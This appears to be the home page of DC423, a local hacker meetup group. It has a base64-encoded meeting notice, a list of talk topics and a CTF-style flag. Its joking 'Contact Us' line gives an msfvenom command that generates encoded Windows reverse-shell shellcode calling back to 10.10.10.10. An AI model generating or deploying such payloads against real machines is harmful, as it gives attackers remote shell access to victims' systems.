Meeting information: TWVldGluZ3MgYXJlIHRoZSBsYXN0IFdlZG5lc2RheSBvZiBldmVyeSBtb250aC4gIENoZWNrIHRoZSBTbGFjayBjaGFubmVsIGZvciBkZXRhaWxzIG9uIHRoaXMgbW9udGgncyBtZWV0aW5nLiAgRmluZCB0aGUgY2hhbGxlbmdlIHRvIGFzayBmb3IgYW4gaW52aXRhdGlvbi4=

RFID Badge Cloning

Making

WiFi ATKs

Code Injection

Bad USB

Carding, Skimming, and Spamming

Gaming

Exploits

flag:{c7f_71m3}

Home Automation

 

Meeting presentations and supporting code can be found in our github repo.

Sign in to the DC423 Slack channel ... after finding a link to request an account.

Sometimes, we're the nicest people on Twitter today.

Contact Us
Apply the code listed below into the terminal of a recent install of Kali Linux and a member of DC423 will be with you shortly.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4449 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"